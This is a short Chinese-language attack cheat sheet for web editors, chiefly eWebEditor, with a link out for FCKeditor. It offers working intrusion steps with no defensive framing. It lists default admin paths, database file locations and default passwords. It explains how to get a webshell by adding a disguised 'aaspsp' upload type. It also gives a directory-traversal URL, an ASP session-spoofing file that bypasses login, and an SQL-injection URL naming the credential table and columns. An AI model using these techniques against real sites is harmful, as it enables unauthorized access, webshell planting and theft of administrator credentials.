编辑器漏洞
网上常用的编辑器有ewebeditor,FCK,DotNetTextBox等,这里只介绍几个常用的。
Ewebeditor:基于浏览器的,所见即所得的在线HTML编辑器
默认后台:ewebeditor/admin_login.asp
默认数据库:ewebeditor/db/ewebeditor.mdb;
ewebeditor/db/ewebeditor.asa
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/#ewebeditor.asa
ewebeditor/db/!@#ewebeditor.asp
ewebeditor/db/ewebeditor1033.mdb
默认账号密码:admin admin/admin888/admin999/admin1/admin000
找到后台后,我们可以先用默认账号密码尝试登陆,如果没有进去,那么我们可以去下载数据库文件,然后去查找管理员的账号密码
1)getshell:
登陆后台,点开样式管理,随意找一个样式打开,在图片类型中添加aaspsp(因为编辑器会过滤asp后缀),接下来就是我们熟悉的上传一句话木马了。
2)遍历目录漏洞:2.8.0存在该漏洞
上传文件管理处,有一个样式目录:
http://xxx.xxx.com/ewebeditor/admin_uploadfile.asp?id=14&dir=.. /.. 在id=14后添加绿色部分
然后你就可以看到整个的网站文件了
3)利用webEbeditor session欺骗进入后台
漏洞文件:Aadmin_Private.asp
新建一个amxking.asp文件,内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问该文件,在去访问后台任意文件,就都可以看到了。
# 4)2.7.0注入漏洞
http://www.0dayhack.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用穿山甲进行猜解,对此进行注入取得账号密码。
FCKeditor编辑器:
这个编辑器的漏洞下面这个博客讲的很细致,我就不再多做废话了:
https://blog.csdn.net/lizhengnanhua/article/details/38451737